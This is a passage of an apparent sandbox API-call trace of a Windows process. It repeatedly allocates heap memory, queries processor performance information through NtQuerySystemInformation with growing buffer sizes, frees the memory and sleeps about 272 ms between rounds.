[0223.251] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.251] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.252] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.253] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.253] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.253] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.254] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.254] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.254] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.255] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.255] Sleep (dwMilliseconds=0x110) [0223.268] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.268] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.269] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.269] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.269] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.269] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.269] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.269] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.270] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.270] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.270] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.271] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.271] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.271] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.271] Sleep (dwMilliseconds=0x110) [0223.281] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.281] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.282] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.282] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.282] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.284] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.284] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.284] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.285] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.285] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.285] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.285] Sleep (dwMilliseconds=0x110) [0223.302] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.302] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.303] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.303] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.303] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.304] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.304] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.304] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.304] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.304] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.304] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.305] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.305] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.305] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.305] Sleep (dwMilliseconds=0x110) [0223.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.333] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.333] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.333] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.334] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.334] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.334] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.334] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.334] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.334] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.335] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.335] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.335] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.335] Sleep (dwMilliseconds=0x110) [0223.342] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.342] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.342] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.342] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.343] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.343] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.343] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.343] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.344] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.345] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.345] Sleep (dwMilliseconds=0x110) [0223.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.362] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.363] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.363] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.364] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.364] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.364] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.364] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.364] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.365] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.365] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.365] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.366] Sleep (dwMilliseconds=0x110) [0223.376] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.377] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.377] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.377] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.377] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.378] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.379] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.379] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.379] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.380] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.381] Sleep (dwMilliseconds=0x110) [0223.397] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.397] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.397] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.398] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.398] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.398] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.398] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.398] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.399] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.405] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.405] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.405] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.405] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.406] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.406] Sleep (dwMilliseconds=0x110) [0223.440] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.441] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.445] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.445] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.445] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.446] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.446] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.446] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.446] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.447] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.447] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.447] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.447] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.448] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.448] Sleep (dwMilliseconds=0x110) [0223.451] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.451] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.452] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.452] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.452] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.452] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.452] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.452] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.453] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.453] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.453] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.453] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.453] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.454] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.454] Sleep (dwMilliseconds=0x110) [0223.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.470] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.471] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.471] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.471] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.472] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.472] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.473] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.473] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.473] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.473] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.474] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.474] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.475] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.475] Sleep (dwMilliseconds=0x110) [0223.481] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.481] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.482] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.486] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.486] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.487] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.487] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.488] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.488] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.488] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.488] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.489] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.489] Sleep (dwMilliseconds=0x110) [0223.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.502] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.503] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.503] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.507] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.507] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.508] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.508] 